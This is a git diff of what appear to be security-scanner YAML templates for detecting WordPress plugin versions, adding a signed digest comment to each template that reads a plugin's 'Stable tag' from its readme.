100644 --- a/http/technologies/wordpress/plugins/royal-elementor-addons.yaml +++ b/http/technologies/wordpress/plugins/royal-elementor-addons.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100862cdb558e07d1d00973bf2bc66790d44a73cb4a5f9d7d24fe3e6a6d029ccf60022006369d949a3d207772d6bafbb0bb52332471c5b14e30e54d46b5ab696d168954:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4d10178692..ef0fbed389 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210099b1d46e6d98122ff5cfbd9b677cf18af72636066ee1cfb33783098554df2963022040ae6001c721e907a1ecdccb90b18b94b0056ea141725cf3263172a0b0ddf952:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 7aac0a153f..4eeead99e9 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d7b51fc69da6c1ad122046ed8eaac25d84a249050b23d8ce7bff80e490fbb1b402203c92953dea3dc1989936a249a1544843c7767fd5e3ef54b7b4c1d928d165b78f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index d0cebd5316..c21ab0b210 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022005c4f0783e7700fc17e7f5090ce6df74dda85b19a1adf58a62bbb84d72b90ba10220264d2451bbd0ca881c8543952b040d73315eb22e2480e7c44f63096a35379f5a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index ff20779157..f007986b7e 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502207d94db3d3778c9b7b890389d7eb82b653eb42eceb8dc2d95686f3c97d797d90b022100b167740db68f5f0099a3d0b2f637ece715b9a4fd2343555e91a64597d82da426:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index fffdc7d017..2cc48563ab 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a27ece37fd4f62dfa6e7d53750862d0d589c5b21d8f016c1cc0d73826f965dfb022100a1e3ab746bc0b2ad8759b018f0a4dc23a34faa5f74c755d6c4244d8e6b9dc27e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7a9746a70d..7b54f0fed9 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022014b9e40006ae38ceca6a3c2e4faa14e38cd832b4f3e891001f6489fddcf0477b022029f25f819aad27584401091adfe8945b018f2d14ce61ddc0a79dc0ef2ad476e3:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 3fe86debf5..30b96a310f 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201c5f3870e8e76700c632726949a763e2448548d03a7e7c7be414f3739c28c1ee02203d0277438a4c14dc74972e0f34cb6cfe067ae17bfdc4a9bac7a4dfe35d93a80d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/simple-history.yaml b/http/technologies/wordpress/plugins/simple-history.yaml index 18a7437e94..889e64aeb5 100644 --- a/http/technologies/wordpress/plugins/simple-history.yaml +++ b/http/technologies/wordpress/plugins/simple-history.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200c6e45f27a7baf3a9e16399cfbad10a5509ea1bcad713f2951a8ab149c22bcbd02206e8d3f58a4aae721956a734df9d8bee43e69c792db269bb4162aabd0e5c22fed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3deac58709..16ec8bbeab 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d0dc07967aad751369b27e15347540cf58b3da16a72eb20390ae0cc6db872230022100fc6ae03daa218b722dbfb1288f4ffc2946d2f6282e1976c219759dd58c8ca156:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e7e7c27682..f20e215ba8 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402206ea05ca0c46b16b165917393b8c9235826557509573d74e2a910dd0b2a814a490220797a091b1090a3849eb34f9839572a3dd4d6334faa21a0a28618298be8729706:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index ad4ebefa4b..b379c68c10 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100ae5d5c872d8edd31c0659b4de07991a1632cdf8a9a58e805d5ae2edb23660f1e02205f7ba7b949fc3395dbbcf80204dbdba64cc7e30fcb7827233a8681b163715f2b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 8e88c81c0a..79e54cc8d5 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022014321f121626af7573107bfbe46dbdfed3b58a3f914aa48397c16c7af28dfa8c02205752775092f4cdf532525b1ac6abf73a56f26ef4a4d3dac720a83158edb8e1df:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml index 39d269fb85..dc0e5bfbcb 100644 --- a/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207d554f5ba9e23aa4a9e8bba568ac03f205fbd53399260931b68edb60998886fe0220253735a69b0e1d5891faeef8786e9176a567c8bd947cf1bc6115d9d794091103:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index fc126d83c6..d4fadf4fed 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e9c74c58293dd5466da6edb38f619aff2e95e91a9afddc99fa262db126e8c89b022100df9a713c9febb34b2ed0feb4497429aadb3ef63f46ca90d941627ec8bd4f449f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 8c49a34259..d00c0349c5 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220634c2f8c7597fc93d196ddf87c0629492c879f64e50b06f7883acede011f4182022100c79b55076402f13c6276a62c13bc5a941e9dc5f51169f4b294050b538bd5634e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index c20ed6552a..024cebc10f 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022077c6846b4aa3479bb425195e28987e4427069cc10a8e067f179cdb96a26bee76022008b0dd985c6a4e30e68cb2231e15a21f680c50e2125a20ee8de9b3eac8643223:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 6ac2212b4b..f9987823f3 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022076510ee07e22d07f991bc01decca43c94829d785b42fd3bade6a9e878202a7e502203eddf3691fefc979889d69f3b0cb6ba236980e92555edf5cf0bbedb92035b6eb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index 71c71b5ed1..3468d31b23 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100f19d94392800a45cefb2ff397b8ca3a92301d5219ebc9b967128b788bd3112a402203c954e087e61ab257d9ed617e3bbeee9b4f067fac6d2407097883755f33d7fde:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 7b47adc274..b66d707a58 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a00463044022063275e71829ef6ad516c9d9223f316d944ad1f7a197a18035c64b5c9f145ed38022075ed70bb775766d06e6e9a46de88b84b284f9a5fe46d46918aa60beec6d50592:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/templately.yaml b/http/technologies/wordpress/plugins/templately.yaml index 38391bd9f3..c06a8a9ea1 100644 --- a/http/technologies/wordpress/plugins/templately.yaml +++ b/http/technologies/wordpress/plugins/templately.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a08fbc3fe7a745b40f291dbc03d6fa6b147fc9931dec23538c84a6d095e33c8d022100a5fc42937b040990e3090cc235da413087cca3a05aab224c320a30b44bd3081b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index c4928059f6..ab37b1a954 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d7e87af94ab24904f0cd1ee48790ff1330ecede0f2a7fdadc979a3dc568c4516022100abb5eaa2c6505e5c917b6a5660bd5c74d252c86ab1d66f02f2591c4afe726b6a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index f6a7836f35..fefdf24c7c 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450221009b95a956e932f22d2be5b6e0f6cbf8d526df005b268ab1ded913fdbaa9108a8a02200c9d5efd8557faf5d69fa7157795e165a2ac4b2d6fa48e4310f95c8ffe42d28e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index b7af708c4f..7d9add1b41 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100bd02de06bc283a1d75df29d1e8fe289034bce69931233a0f43f3fa1c3d124d84022100f12323a0251687f1c2a23ec3bdc51cadc9c86b7bcb400e305c3c6ff82f0adf5d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 61a793edf7..2fbc8cf8aa 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502200f8ee56f534f7337235066e34df1fda0c302384cbfb54dd65656c19b2cb6bc9a022100eb128e09bcc791c2f6996ffa6d7c61ea9ee3ba3c01f6fe303897e19b316d63ed:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 0da88d5d3f..71db87e86c 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220088ddd3d0e2a902dea471eb0a35e67dba56f2f689873910ee2d115adf22d88cd02210094a0156589f6b34a12f6366045afc6fe39117838000689a8f3ff766aee9940c4:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 3e1e79e004..c3a4a1eef7 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100e5e2a31f6c635a691428740c37120877d8327d34b4e9cda9e23a3a92e76918c7022100aaf46a188c5eb6357c4e8845747b616e8d6f753e81b2bb731e889526e6dfb2dc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index 181e619a7c..b91c743292 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220209d98c0feec171ff2f8fc2f4df7c7bdfe9e76905ac6fd952cded9c921d7548102204e6ade201d7669d30e243bcc44d800cf5faed38050e016f4db613b8429aac2a8:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 8164eb4483..e83868ca9b 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220582adf756a98fb24ceef4725a3cf251f684089c2269ed95fa919be0cc71afcff022100e056ce8d16bf09093320e35a273b2cbb07e784cbb64b6944ea3dab8140c781d7:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 59554defdf..8abb4355d3 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a004730450220352f38cf39c04977f2ce7c32a8831060fcd33c5e6d54f8c2ccfee109a20124ed022100e2219c769fef426680e6291f58faab2e2c7cc39edf1cfaa4509cb3aaa0d9d6c0:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 350fd9436b..d517d521af 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100a8ad5160d7e56a1782ff4dba98c3d903d29c475f26c3012611d8968b08653aed022100a21dd254ec5377ee0aeb94cd605bfc4f82e994f67953e180caed0b2af72650fb:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index 2ae6bafbba..d43139e34a 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100d726fccb0e8caa3ff8e1b84e84aa6be3f3b2e6237a9d1b4ee48d92b5002c75f00220242d99c876139bd9646f425459270f5147431f274f1e9832934bf568b9094af6:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index d0dc8d92bb..d23afa216d 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a004630440220692897ea41dcf0ee74304a031553a2be94b26809b80c44d3777e4823142e7ab3022078dd91136da100c9a0f94f6fbd2a12be1a526dd5658da9f22ec34337482050ba:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index c49bbc2b6d..61e3be4e81 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502210083de2a05a87510a27fc71a0f15f044381429677a346fb6949cfda048516a35ab022076ade3c2d45269487ba5522dba22b1f49df2a4c687ff3189b01bca1946cbf77a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 27586cbd9d..1cc7897f17 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f5ffa4e5005a43603f74ccd33e6f50fa06124c8dba88a69cf662520cd5298413022100a77e83e7dadead063760053fd0a6ef3540a5342e77e333255904c14db029bc9d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index 946272f0a9..86509ea0c9 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402207d2148dcf3a780e7ef85ffbcaa9a3c5e4d13a832621e6aab14801b4f48d821c6022069e738f289ba46c2a289c0addf69a9b80431e51711e3b74777a558795b9ea4bc:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml index aa29706872..ad44e6f77e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200a8131b754cdbf40ab79158e4551df104115450a63ec750291de4dc99ab4911f0220474e2e1968d6615d6199c71ae5625c8d0ec87bb050315f0997901f97a8f564bd:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index 290d53ab7e..6ae7278a6e 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022057ab7fde9255ac412f4e71c96457564531e468c74afda668b8b87030d44b0664022100f5083c974a71f7af88b8c116beb5e2bc402d740ed1f498b8e737b4fc172b4f2d:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index e83e8d79e7..e1ef83730b 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100d464b1ef253342d03da3da3ea24ce030c5aa020ed0d6336065db7d748489ffc80221008684a04c4bf59c7b0104fd2f03fd63b9ca59d4d1e52c586b482711ccdfeef94e:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index f1c16275a2..868339627a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100f6bc18d26457bafa3f6d899c147174b80e4c2ff4491eb27f78d1feb5dcf92a85022100f81720b818b2153f1f4825be5546a8bc52c26200b11d6a88da92599df98ffa8a:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index fc072e19d8..a92be49cdd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100b13b7705581ebfbf09b305914aa2a13ca9744f90758d5fb1d2453a34dbbf1160022100d69b6504e461308a6832906e1689e0a43733147b8e1d63ea587904f95b91a12f:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index da9df0e8a5..7d90596574 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a00473045022100e0e8abecdd1d270dbea78510c775feecae72936fbf4adf5cff91d6181932ac8b02206b32fcc176a93043208aaccf6e4b32207fb5b09f1bc3f4c33fb75c288bceb29c:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index f8113d9750..a439a350bb 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4a0a0047304502202f73d073b1307b039f79327d1b89dc7234f69fc157889792c059772f82693d24022100b2c5db1f9c073e4a4376284b8a47ac4625ca43090503df16111aa6469a64838b:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index 5f80282ab2..6fc6472d57 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402201fd5a51e6836fce2b0881a30083d16b44ea747efc1f13ef8b5c3128f9d2b1010022048556b2d700dfc31e70cbecf015c3b3fa6822e1fc575fe0f0e18871be4971501:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 5725d5bb3f..e756cefa47 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 490a0046304402200244d9ddbbffea3fa1df52de798cd026f07d098760e1f56311290b115ea1e62002200ca78fa83fbcb2eb4d6ed7395452f0c1c7f0715d825b16dc1b472c9c0406b720:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index f67a8bc18a..27ee1c33e3 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 4b0a00483046022100c63893e04cc352c2091b34940eb8383d93ccf6e471e8c54e92918107fbf09f32022100b8e7f07472343b3027a325d92d12027e810096ed005c64ecad59b67bc28cd032:922c64590222798bb761d5b6d8e72950 \ No newline at end of file diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index b9bd4be0a8..41158374f2 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml @@ -46,3 +46,4 @@ http: part: body regex: - '(?i)Stable.tag:\s?([\w.]+)' +# digest: 